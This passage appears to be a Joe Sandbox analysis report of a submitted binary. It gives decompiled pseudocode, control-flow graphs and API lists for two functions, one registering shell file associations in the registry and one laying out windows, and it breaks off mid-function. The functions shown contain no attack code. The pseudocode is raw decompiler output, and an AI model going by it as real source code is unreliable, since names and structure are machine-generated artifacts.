                  control_flow_graph 0 427acd-427b14 call 431a9b call 4014c0 * 2 call 41f363 call 4292e7 11 427fb7-427fd2 call 4010b0 * 2 call 431b73 0->11 12 427b1a-427b1d 0->12 14 427b20-427b72 call 408692 call 405562 * 4 12->14 30 427be0-427c0e call 4014c0 * 3 14->30 31 427b74-427b9d call 4014c0 call 41f363 ExtractIconA 14->31 51 427c14-427c1b 30->51 52 427f5c-427f5f 30->52 41 427bb9-427bc6 call 4015a0 31->41 42 427b9f-427bb7 call 4015a0 DestroyCursor 31->42 48 427bc9-427bdb call 405e21 call 4010b0 41->48 42->48 48->30 51->52 53 427c21-427c30 51->53 55 427f62-427f96 call 4010b0 * 5 52->55 60 427c32-427c39 call 4056c2 53->60 61 427c3e-427c4d call 427206 53->61 87 427f99-427f9e call 4010b0 55->87 60->61 68 427c4f-427c73 call 4010b0 * 3 61->68 69 427c9c-427c9e 61->69 101 427c76-427c97 call 4010b0 * 3 68->101 72 427ca0-427cba call 4015a0 call 427206 69->72 73 427ce9-427cf8 69->73 89 427cbf-427cc1 72->89 83 427d32-427d5d call 4015a0 call 427206 73->83 84 427cfa-427d01 73->84 95 427cc3-427ce7 call 4010b0 * 3 83->95 109 427d63-427d65 83->109 84->83 88 427d03-427d12 call 405ec1 84->88 104 427fa1-427fb1 call 4010b0 87->104 105 427d18-427d25 call 405ec1 88->105 106 427de9-427e12 call 4015a0 call 427206 88->106 89->73 89->95 95->101 101->104 104->11 104->14 126 427d2a-427d2d 105->126 134 427e53-427e58 106->134 135 427e14-427e4e call 4010b0 * 5 106->135 116 427d67-427d8d call 4015a0 call 427206 109->116 117 427ddc-427de1 109->117 116->95 141 427d93-427db2 call 4015a0 call 427206 116->141 123 427de4 call 405ec1 117->123 123->106 126->123 136 427eb4-427ec9 134->136 137 427e5a-427e80 call 4015a0 call 427206 134->137 135->87 136->55 147 427ecf-427f03 call 4014f0 call 420018 call 40a356 136->147 137->55 157 427e86-427ea7 call 4015a0 call 427206 137->157 158 427db7-427db9 141->158 176 427f05-427f0c 147->176 177 427f1d-427f2c call 427206 147->177 171 427eac-427eae 157->171 158->95 162 427dbf-427dd7 call 405ec1 * 2 158->162 162->126 171->55 171->136 176->177 179 427f0e-427f1b call 409f00 176->179 177->55 182 427f2e-427f32 177->182 179->55 179->177 182->55 184 427f34-427f55 call 4015a0 call 427206 182->184 188 427f5a 184->188 188->55
                  C-Code - Quality: 90%
                  			E00427ACD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t148;
				void* _t166;
				void* _t177;
				intOrPtr _t179;
				intOrPtr _t182;
				intOrPtr _t192;
				intOrPtr _t195;
				void* _t197;
				intOrPtr _t198;
				intOrPtr _t200;
				intOrPtr _t204;
				intOrPtr _t205;
				intOrPtr _t208;
				intOrPtr _t211;
				intOrPtr _t219;
				intOrPtr _t222;
				intOrPtr _t225;
				intOrPtr _t230;
				struct HICON__* _t239;
				void* _t240;
				intOrPtr _t247;
				intOrPtr _t248;
				void* _t276;
				void* _t277;
				void* _t294;
				intOrPtr* _t327;
				intOrPtr _t328;
				char* _t329;
				void* _t330;
				void* _t332;
				intOrPtr _t333;
				intOrPtr _t334;
				char* _t335;
				struct HICON__* _t336;
				void* _t338;
				void* _t339;
				void* _t340;
				intOrPtr _t342;

				_t340 = __eflags;
				_t325 = __edx;
				_push(0x3c);
				E00431A9B(E0044C457, __ebx, __edi, __esi);
				_t332 = __ecx;
				E004014C0(_t338 - 0x2c, __edx);
				 *(_t338 - 4) =  *(_t338 - 4) & 0x00000000;
				E004014C0(_t338 - 0x14, __edx);
				 *(_t338 - 4) = 1;
				E004292E7(__ebx, __edx,  *((intOrPtr*)(E0041F363(__ebx, __edi, _t332, _t340) + 8)), _t338 - 0x2c); // executed
				_t148 =  *((intOrPtr*)(_t332 + 8));
				 *((intOrPtr*)(_t338 - 0x3c)) = _t148;
				 *(_t338 - 0x30) = 1;
				if(_t148 == 0) {
					L45:
					E004010B0( *((intOrPtr*)(_t338 - 0x14)) + 0xfffffff0, _t325);
					return E00431B73(E004010B0( &(( *(_t338 - 0x2c))[0xfffffffffffffff0]), _t325));
				} else {
					_t333 = _t332 + 4;
					_t342 = _t333;
					 *((intOrPtr*)(_t338 - 0x40)) = _t333;
					do {
						_t327 =  *((intOrPtr*)(E00408692(_t338 - 0x3c)));
						 *((intOrPtr*)(_t338 - 0x44)) = _t327;
						E00405562(_t338 - 0x24, _t342, _t338 - 0x2c);
						 *(_t338 - 4) = 2;
						E00405562(_t338 - 0x28, _t342, _t338 - 0x2c);
						 *(_t338 - 4) = 3;
						E00405562(_t338 - 0x20, _t342, _t338 - 0x2c);
						 *(_t338 - 4) = 4;
						E00405562(_t338 - 0x38, _t342, _t338 - 0x2c);
						_t247 =  *((intOrPtr*)(_t338 + 8));
						_t343 = _t247;
						if(_t247 != 0) {
							E004014C0(_t338 - 0x34, _t325);
							_t335 =  *(_t338 - 0x2c);
							 *(_t338 - 4) = 6;
							_t239 = ExtractIconA( *(E0041F363(_t247, _t327, _t335, _t343) + 8), _t335,  *(_t338 - 0x30)); // executed
							_t336 = _t239;
							_t240 = _t338 - 0x34;
							if(_t336 == 0) {
								E004015A0(_t240, ",%d", 0);
								_t339 = _t339 + 0xc;
							} else {
								E004015A0(_t240, ",%d",  *(_t338 - 0x30));
								_t339 = _t339 + 0xc;
								DestroyCursor(_t336);
							}
							E00405E21(_t338 - 0x38, _t325,  *((intOrPtr*)(_t338 - 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x34)) - 0xc)));
							E004010B0( *((intOrPtr*)(_t338 - 0x34)) - 0x10, _t325);
						}
						E004014C0(_t338 - 0x18, _t325);
						E004014C0(_t338 - 0x10, _t325);
						E004014C0(_t338 - 0x1c, _t325);
						 *(_t338 - 4) = 9;
						_t166 =  *((intOrPtr*)( *_t327 + 0x64))(_t338 - 0x10, 5);
						_t334 =  *((intOrPtr*)(_t338 - 0x38));
						if(_t166 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x10)) - 0xc)) == 0) {
							_t328 =  *((intOrPtr*)(_t338 - 0x24));
							_t248 =  *((intOrPtr*)(_t338 - 0x28));
							goto L42;
						} else {
							_push(6);
							_push(_t338 - 0x1c);
							if( *((intOrPtr*)( *_t327 + 0x64))() == 0) {
								E004056C2(_t247, _t338 - 0x1c, _t338 - 0x10);
							}
							_t177 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x10)),  *((intOrPtr*)(_t338 - 0x1c)), 0); // executed
							if(_t177 != 0) {
								__eflags = _t247;
								if(_t247 == 0) {
									L17:
									_t179 =  *((intOrPtr*)( *_t327 + 0x64))(_t338 - 0x14, 0);
									__eflags = _t179;
									if(_t179 == 0) {
										L22:
										_t329 = "ddeexec";
										_push(_t329);
										E004015A0(_t338 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t338 - 0x10)));
										_t339 = _t339 + 0x10;
										_t182 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[open(\"%1\")]", 0); // executed
										__eflags = _t182;
										if(_t182 == 0) {
											L16:
											E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
											_t288 = _t334 - 0x10;
											goto L13;
										}
										__eflags = _t247;
										if(_t247 == 0) {
											_push(" \"%1\"");
											_t294 = _t338 - 0x24;
											L28:
											E00405EC1(_t294);
											L29:
											_push("command");
											E004015A0(_t338 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t338 - 0x10)));
											_t328 =  *((intOrPtr*)(_t338 - 0x24));
											_t339 = _t339 + 0x10;
											_t192 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t328, 0); // executed
											__eflags = _t192;
											if(_t192 != 0) {
												__eflags = _t247;
												_t248 =  *((intOrPtr*)(_t338 - 0x28));
												if(_t247 == 0) {
													L34:
													_t325 = _t338 - 0x18;
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t338 - 0x44)))) + 0x64))(_t338 - 0x18, 4);
													_t195 =  *((intOrPtr*)(_t338 - 0x18));
													__eflags =  *((intOrPtr*)(_t195 - 0xc));
													if( *((intOrPtr*)(_t195 - 0xc)) == 0) {
														L42:
														E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
														E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
														E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
														E004010B0(_t334 - 0x10, _t325);
														__eflags =  *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0;
														E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
														_t276 = _t248 - 0x10;
														L43:
														E004010B0(_t276, _t325);
														_t277 = _t328 - 0x10;
														goto L44;
													}
													 *((intOrPtr*)(_t338 - 0x44)) = 0x208;
													_t197 = E004014F0(_t338 - 0x14, 0x208);
													_push(_t338 - 0x44);
													_push(_t197);
													_push( *((intOrPtr*)(_t338 - 0x18)));
													_push(0x80000000); // executed
													_t198 = E00420018(_t248, _t325, _t328, _t334, __eflags); // executed
													 *((intOrPtr*)(_t338 - 0x48)) = _t198;
													E0040A356(_t338 - 0x14, 0xffffffff);
													__eflags =  *((intOrPtr*)(_t338 - 0x48));
													if( *((intOrPtr*)(_t338 - 0x48)) != 0) {
														L38:
														_t200 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x18)),  *((intOrPtr*)(_t338 - 0x10)), 0); // executed
														__eflags = _t200;
														if(_t200 != 0) {
															__eflags =  *((intOrPtr*)(_t338 + 8));
															if( *((intOrPtr*)(_t338 + 8)) != 0) {
																E004015A0(_t338 - 0x14, "%s\\ShellNew",  *((intOrPtr*)(_t338 - 0x18)));
																_t339 = _t339 + 0xc;
																E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), 0x44f0f5, "NullFile"); // executed
															}
														}
														goto L42;
													}
													_t204 =  *((intOrPtr*)(_t338 - 0x14));
													__eflags =  *((intOrPtr*)(_t204 - 0xc));
													if( *((intOrPtr*)(_t204 - 0xc)) == 0) {
														goto L38;
													}
													_t205 = E00409F00(_t338 - 0x14, _t325,  *((intOrPtr*)(_t338 - 0x10)));
													__eflags = _t205;
													if(_t205 != 0) {
														goto L42;
													}
													goto L38;
												}
												_push("command");
												E004015A0(_t338 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t338 - 0x10)));
												_t339 = _t339 + 0x10;
												_t208 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t248, 0); // executed
												__eflags = _t208;
												if(_t208 == 0) {
													goto L42;
												}
												_push("command");
												E004015A0(_t338 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t338 - 0x10)));
												_t339 = _t339 + 0x10;
												_t211 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)),  *((intOrPtr*)(_t338 - 0x20)), 0); // executed
												__eflags = _t211;
												if(_t211 == 0) {
													goto L42;
												}
												goto L34;
											}
											E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
											E004010B0(_t334 - 0x10, _t325);
											E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
											_t276 =  *((intOrPtr*)(_t338 - 0x28)) + 0xfffffff0;
											goto L43;
										}
										_push(_t329);
										E004015A0(_t338 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t338 - 0x10)));
										_t339 = _t339 + 0x10;
										_t219 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[print(\"%1\")]", 0); // executed
										__eflags = _t219;
										if(_t219 == 0) {
											goto L16;
										}
										_push(_t329);
										E004015A0(_t338 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t338 - 0x10)));
										_t339 = _t339 + 0x10;
										_t222 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0); // executed
										__eflags = _t222;
										if(_t222 == 0) {
											goto L16;
										}
										_t330 = " /dde";
										E00405EC1(_t338 - 0x24, _t330);
										E00405EC1(_t338 - 0x28, _t330);
										_push(_t330);
										L21:
										_t294 = _t338 - 0x20;
										goto L28;
									}
									_t225 =  *((intOrPtr*)(_t338 - 0x14));
									__eflags =  *((intOrPtr*)(_t225 - 0xc));
									if( *((intOrPtr*)(_t225 - 0xc)) == 0) {
										goto L22;
									}
									E00405EC1(_t338 - 0x24, " \"%1\"");
									__eflags = _t247;
									if(_t247 == 0) {
										goto L29;
									}
									E00405EC1(_t338 - 0x28, " /p \"%1\"");
									_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
									goto L21;
								}
								E004015A0(_t338 - 0x14, "%s\\DefaultIcon",  *((intOrPtr*)(_t338 - 0x10)));
								_t339 = _t339 + 0xc;
								_t230 = E00427206(_t334,  *((intOrPtr*)(_t338 - 0x14)), _t334, 0); // executed
								__eflags = _t230;
								if(_t230 != 0) {
									goto L17;
								}
								goto L16;
							} else {
								E004010B0( *((intOrPtr*)(_t338 - 0x1c)) + 0xfffffff0, _t325);
								E004010B0( *((intOrPtr*)(_t338 - 0x10)) + 0xfffffff0, _t325);
								E004010B0( *((intOrPtr*)(_t338 - 0x18)) + 0xfffffff0, _t325);
								_t288 =  *((intOrPtr*)(_t338 - 0x38)) + 0xfffffff0;
								L13:
								E004010B0(_t288, _t325);
								E004010B0( *((intOrPtr*)(_t338 - 0x20)) + 0xfffffff0, _t325);
								E004010B0( *((intOrPtr*)(_t338 - 0x28)) + 0xfffffff0, _t325);
								_t277 =  *((intOrPtr*)(_t338 - 0x24)) + 0xfffffff0;
								goto L44;
							}
						}
						L44:
						 *(_t338 - 4) = 1;
						E004010B0(_t277, _t325);
						 *(_t338 - 0x30) =  *(_t338 - 0x30) + 1;
					} while ( *((intOrPtr*)(_t338 - 0x3c)) != 0);
					goto L45;
				}
			}









































                  0x00427acd
                  0x00427acd
                  0x00427acd
                  0x00427ad4
                  0x00427ad9
                  0x00427ade
                  0x00427ae3
                  0x00427aea
                  0x00427aef
                  0x00427b00
                  0x00427b05
                  0x00427b08
                  0x00427b0b
                  0x00427b14
                  0x00427fb7
                  0x00427fbd
                  0x00427fd2
                  0x00427b1a
                  0x00427b1a
                  0x00427b1a
                  0x00427b1d
                  0x00427b20
                  0x00427b2c
                  0x00427b35
                  0x00427b38
                  0x00427b44
                  0x00427b48
                  0x00427b54
                  0x00427b58
                  0x00427b64
                  0x00427b68
                  0x00427b6d
                  0x00427b70
                  0x00427b72
                  0x00427b77
                  0x00427b7c
                  0x00427b7f
                  0x00427b90
                  0x00427b96
                  0x00427b98
                  0x00427b9d
                  0x00427bc1
                  0x00427bc6
                  0x00427b9f
                  0x00427ba8
                  0x00427bad
                  0x00427bb1
                  0x00427bb1
                  0x00427bd3
                  0x00427bdb
                  0x00427bdb
                  0x00427be3
                  0x00427beb
                  0x00427bf3
                  0x00427c02
                  0x00427c06
                  0x00427c09
                  0x00427c0e
                  0x00427f5c
                  0x00427f5f
                  0x00000000
                  0x00427c21
                  0x00427c23
                  0x00427c28
                  0x00427c30
                  0x00427c39
                  0x00427c39
                  0x00427c46
                  0x00427c4d
                  0x00427c9c
                  0x00427c9e
                  0x00427ce9
                  0x00427cf3
                  0x00427cf6
                  0x00427cf8
                  0x00427d32
                  0x00427d32
                  0x00427d37
                  0x00427d44
                  0x00427d49
                  0x00427d56
                  0x00427d5b
                  0x00427d5d
                  0x00427cc3
                  0x00427cc9
                  0x00427cd4
                  0x00427cdf
                  0x00427ce4
                  0x00000000
                  0x00427ce4
                  0x00427d63
                  0x00427d65
                  0x00427ddc
                  0x00427de1
                  0x00427de4
                  0x00427de4
                  0x00427de9
                  0x00427de9
                  0x00427dfa
                  0x00427dff
                  0x00427e02
                  0x00427e0b
                  0x00427e10
                  0x00427e12
                  0x00427e53
                  0x00427e55
                  0x00427e58
                  0x00427eb4
                  0x00427ebb
                  0x00427ebf
                  0x00427ec2
                  0x00427ec5
                  0x00427ec9
                  0x00427f62
                  0x00427f68
                  0x00427f73
                  0x00427f7e
                  0x00427f86
                  0x00427f8e
                  0x00427f91
                  0x00427f96
                  0x00427f99
                  0x00427f99
                  0x00427f9e
                  0x00000000
                  0x00427f9e
                  0x00427ed8
                  0x00427edb
                  0x00427ee3
                  0x00427ee4
                  0x00427ee5
                  0x00427ee8
                  0x00427eed
                  0x00427ef7
                  0x00427efa
                  0x00427eff
                  0x00427f03
                  0x00427f1d
                  0x00427f25
                  0x00427f2a
                  0x00427f2c
                  0x00427f2e
                  0x00427f32
                  0x00427f40
                  0x00427f45
                  0x00427f55
                  0x00427f55
                  0x00427f32
                  0x00000000
                  0x00427f2c
                  0x00427f05
                  0x00427f08
                  0x00427f0c
                  0x00000000
                  0x00000000
                  0x00427f14
                  0x00427f19
                  0x00427f1b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00427f1b
                  0x00427e5a
                  0x00427e6b
                  0x00427e70
                  0x00427e79
                  0x00427e7e
                  0x00427e80
                  0x00000000
                  0x00000000
                  0x00427e86
                  0x00427e97
                  0x00427e9c
                  0x00427ea7
                  0x00427eac
                  0x00427eae
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00427eae
                  0x00427e1a
                  0x00427e25
                  0x00427e30
                  0x00427e38
                  0x00427e43
                  0x00427e4b
                  0x00000000
                  0x00427e4b
                  0x00427d67
                  0x00427d74
                  0x00427d79
                  0x00427d86
                  0x00427d8b
                  0x00427d8d
                  0x00000000
                  0x00000000
                  0x00427d93
                  0x00427da0
                  0x00427da5
                  0x00427db2
                  0x00427db7
                  0x00427db9
                  0x00000000
                  0x00000000
                  0x00427dbf
                  0x00427dc8
                  0x00427dd1
                  0x00427dd6
                  0x00427d2a
                  0x00427d2a
                  0x00000000
                  0x00427d2a
                  0x00427cfa
                  0x00427cfd
                  0x00427d01
                  0x00000000
                  0x00000000
                  0x00427d0b
                  0x00427d10
                  0x00427d12
                  0x00000000
                  0x00000000
                  0x00427d20
                  0x00427d25
                  0x00000000
                  0x00427d25
                  0x00427cac
                  0x00427cb1
                  0x00427cba
                  0x00427cbf
                  0x00427cc1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00427c4f
                  0x00427c55
                  0x00427c60
                  0x00427c6b
                  0x00427c73
                  0x00427c76
                  0x00427c76
                  0x00427c81
                  0x00427c8c
                  0x00427c94
                  0x00000000
                  0x00427c94
                  0x00427c4d
                  0x00427fa1
                  0x00427fa1
                  0x00427fa5
                  0x00427faa
                  0x00427fad
                  0x00000000
                  0x00427b20

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00427AD4
                    • Part of subcall function 004292E7: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                    • Part of subcall function 004292E7: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  • ExtractIconA.SHELL32(?,?,00000001), ref: 00427B90
                  • DestroyCursor.USER32(00000000), ref: 00427BB1
                    • Part of subcall function 00427206: lstrlenA.KERNEL32(?), ref: 00427214
                    • Part of subcall function 00427206: lstrlenA.KERNEL32(?,80000000,?,?), ref: 0042724D
                    • Part of subcall function 00427206: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,?,00000001), ref: 00427262
                    • Part of subcall function 00427206: RegCloseKey.ADVAPI32(?), ref: 0042726D
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Namelstrlen$CloseCursorDestroyExtractFileH_prolog3IconModulePathShortValue
                  • String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
                  • API String ID: 519677498-4043335175
                  • Opcode ID: fa335e7d5f54601939ab60626600fbe5f1b4d029b047e4cf50c6b1b1f199abd5
                  • Instruction ID: 9143f19bdfc8b7c6ecc2443052c1ae3c958a6745bc1d14e11510287793223560
                  • Opcode Fuzzy Hash: fa335e7d5f54601939ab60626600fbe5f1b4d029b047e4cf50c6b1b1f199abd5
                  • Instruction Fuzzy Hash: FFE17D31A04119ABCB14EBA5DC92FBFB774AF14318F64022AF521772E2DB385944CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00413B62, Relevance: 21.4, APIs: 14, Instructions: 421COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 189 413b62-413b74 190 413b76 call 406436 189->190 191 413b7b-413b98 call 421213 IsRectEmpty 189->191 190->191 195 413bc0-413bc9 call 40f898 191->195 196 413b9a-413bbe 191->196 195->190 201 413bcb-413be1 GetClientRect 195->201 200 413be4-413bf1 196->200 202 413bf3-413bf7 200->202 203 413bf9-413c05 BeginDeferWindowPos 200->203 201->200 204 413c08-413c2f 202->204 203->204 205 413c35-413c5a call 413638 call 40b917 204->205 206 413fd9-413fe2 204->206 217 413c60-413c6c 205->217 218 413f52-413f54 205->218 207 413ff2-414012 SetRectEmpty 206->207 208 413fe4-413fe7 206->208 215 414014-414017 207->215 216 414019-41401d 207->216 208->207 210 413fe9-413fec KiUserCallbackDispatcher 208->210 210->207 215->216 219 414029-41402c 215->219 216->219 220 41401f-414027 216->220 230 413c72-413c7a 217->230 231 413f3c-413f40 217->231 221 413fc0-413fcf 218->221 222 413f56-413f5a 218->222 223 414033-414038 219->223 224 41402e-414031 219->224 220->219 221->205 228 413fd5-413fd7 221->228 222->221 229 413f5c-413f66 222->229 225 414045-41404b 223->225 226 41403a-414042 223->226 224->223 224->225 226->225 228->206 232 413f93-413f9f 229->232 233 413f68-413f77 229->233 235 413c85-413c91 230->235 236 413c7c-413c7e 230->236 231->221 234 413f42-413f50 231->234 239 413fa1 232->239 240 413fa3-413faa 232->240 237 413f79 233->237 238 413f7b-413f82 233->238 234->221 244 413c94-413cd2 call 41335b GetWindowRect call 422bfb 235->244 236->235 243 413c80-413c83 236->243 237->238 245 413f84 238->245 246 413f86-413f91 238->246 239->240 241 413fac 240->241 242 413fae-413fb9 240->242 241->242 247 413fbc 242->247 243->244 254 413e21-413e27 244->254 255 413cd8-413cde 244->255 245->246 246->247 247->221 258 413e45-413e4d 254->258 259 413e29-413e33 254->259 256 413ce0-413cea 255->256 257 413cfc-413d04 255->257 256->257 260 413cec-413cf6 OffsetRect 256->260 261 413d35-413d39 257->261 262 413d06-413d10 257->262 264 413e4f-413e59 258->264 265 413e7e-413e82 258->265 259->258 263 413e35-413e3f OffsetRect 259->263 260->257 269 413d3f-413d56 OffsetRect 261->269 270 413dce-413dda 261->270 262->261 268 413d12-413d21 262->268 263->258 264->265 271 413e5b-413e6a 264->271 266 413ea3-413eaf 265->266 267 413e84-413ea1 OffsetRect 265->267 276 413ed3-413ee3 EqualRect 266->276 277 413eb1-413eb5 266->277 267->276 278 413d23 268->278 279 413d25-413d2f OffsetRect 268->279 274 413d5c-413d6c EqualRect 269->274 270->274 275 413ddc-413de0 270->275 272 413e6c 271->272 273 413e6e-413e78 OffsetRect 271->273 272->273 273->265 284 413dae-413dc0 274->284 285 413d6e-413d78 274->285 275->274 280 413de6-413dfc call 40b917 275->280 282 413f22-413f37 276->282 283 413ee5-413eef 276->283 277->276 281 413eb7-413ecd call 40b917 277->281 278->279 279->261 280->274 300 413e02-413e1c call 4260f4 280->300 281->276 281->300 282->234 286 413f39 282->286 290 413ef1-413ef8 283->290 291 413f12-413f1d call 40cee2 283->291 284->234 287 413dc6-413dc9 284->287 292 413d7a-413d81 285->292 293 413d9e-413da9 call 40cee2 285->293 286->231 287->234 290->291 296 413efa-413f10 290->296 291->282 292->293 297 413d83-413d9c 292->297 293->284 296->291 297->293 300->222
                  C-Code - Quality: 88%
                  			E00413B62(intOrPtr* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				struct tagRECT _v64;
				struct tagRECT _v80;
				struct tagRECT _v96;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t181;
				intOrPtr _t185;
				signed int _t187;
				intOrPtr _t192;
				intOrPtr _t193;
				signed int _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t211;
				signed int _t215;
				intOrPtr _t223;
				intOrPtr _t224;
				signed int _t229;
				signed int _t230;
				intOrPtr _t231;
				intOrPtr _t235;
				signed int* _t238;
				signed int _t240;
				signed int _t245;
				int _t246;
				int _t249;
				long _t252;
				intOrPtr _t253;
				signed int _t259;
				signed int* _t267;
				signed int _t268;
				void* _t275;
				intOrPtr* _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t295;
				signed int* _t306;
				signed int _t313;
				signed int _t321;
				intOrPtr _t322;
				intOrPtr _t323;
				intOrPtr _t336;
				void* _t338;
				intOrPtr* _t340;
				intOrPtr* _t341;
				signed int _t349;
				signed int _t350;
				intOrPtr* _t351;
				signed int _t354;

				_t291 = __ecx;
				_t285 = __ecx;
				_v8 = __ecx;
				_t357 = __ecx;
				if(__ecx != 0) {
					L2:
					E00421213(_a4, _a8, _a12);
					_t348 = _t285 + 0xb4;
					if(IsRectEmpty(_t285 + 0xb4) != 0) {
						_t291 = _t285;
						_t181 = E0040F898(_t285);
						__eflags = _t181;
						if(__eflags == 0) {
							goto L1;
						} else {
							GetClientRect( *(_t181 + 0x20),  &_v80);
							_t185 = _v80.right - _v80.left;
							_t295 = _v80.bottom - _v80.top;
							__eflags = _t295;
							goto L6;
						}
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *((intOrPtr*)( *_t285 + 0x148))( &_v64, _a12);
						_t185 = _v64.right - _v64.left;
						_t295 = _v64.bottom - _v64.top;
						L6:
						_v28 = _t295;
						_v32 = _t185;
						if( *((intOrPtr*)(_t285 + 0xb0)) == 0) {
							_v128 = BeginDeferWindowPos( *(_t285 + 0xa4));
						} else {
							_v128 = _v128 & 0x00000000;
						}
						_t286 =  *0x466520; // 0x2
						_t349 =  *0x466524; // 0x2
						_t340 = _v8;
						_t187 = 0;
						_t350 =  ~_t349;
						_t287 =  ~_t286;
						_v44 = _t350;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						if( *((intOrPtr*)(_t340 + 0xa4)) <= 0) {
							L76:
							_t351 = _a4;
							if( *((intOrPtr*)(_t340 + 0xb0)) == _t187 && _v128 != _t187) {
								EndDeferWindowPos(_v128); // executed
							}
							SetRectEmpty( &_v96);
							 *((intOrPtr*)( *_t340 + 0x148))( &_v96, _a12);
							if(_a8 == 0 || _a12 == 0) {
								_t192 =  *_t351;
								if(_t192 != 0) {
									 *_t351 = _v96.left - _v96.right + _t192;
								}
							}
							if(_a8 == 0 || _a12 != 0) {
								_t193 =  *((intOrPtr*)(_t351 + 4));
								if(_t193 != 0) {
									 *((intOrPtr*)(_t351 + 4)) = _v96.top - _v96.bottom + _t193;
								}
							}
							return _t351;
						} else {
							do {
								_t341 = E00413638(_v8, _v12);
								_v24 = _t341;
								_t198 =  *(E0040B917(_v8 + 0x9c, _v12));
								if(_t341 == 0) {
									__eflags = _t198;
									if(_t198 != 0) {
										goto L74;
									}
									L61:
									__eflags = _v16;
									if(_v16 != 0) {
										__eflags = _a12;
										_t200 = _v16;
										_t306 = _a4;
										if(_a12 == 0) {
											_t287 = _t287 + _t200 -  *0x466520;
											_t202 =  *_t306;
											__eflags = _t202 - _t287;
											if(_t202 <= _t287) {
												_t202 = _t287;
											}
											 *_t306 = _t202;
											_t203 = _t306[1];
											__eflags = _t203 - _t350;
											if(_t203 <= _t350) {
												_t203 = _t350;
											}
											_t306[1] = _t203;
											_t354 =  *0x466524; // 0x2
											_t350 =  ~_t354;
											_v44 = _t350;
										} else {
											_t350 = _t350 + _t200 -  *0x466524;
											_t205 =  *_t306;
											__eflags = _t205 - _t287;
											_v44 = _t350;
											if(_t205 > _t287) {
												_t287 = _t205;
											}
											_t206 = _t306[1];
											__eflags = _t206 - _t350;
											 *_t306 = _t287;
											if(_t206 <= _t350) {
												_t206 = _t350;
											}
											_t306[1] = _t206;
											_t288 =  *0x466520; // 0x2
											_t287 =  ~_t288;
										}
										_t154 =  &_v16;
										 *_t154 = _v16 & 0x00000000;
										__eflags =  *_t154;
									}
									goto L74;
								}
								if( *((intOrPtr*)( *_t341 + 0x168))() == 0) {
									L58:
									__eflags = _v20;
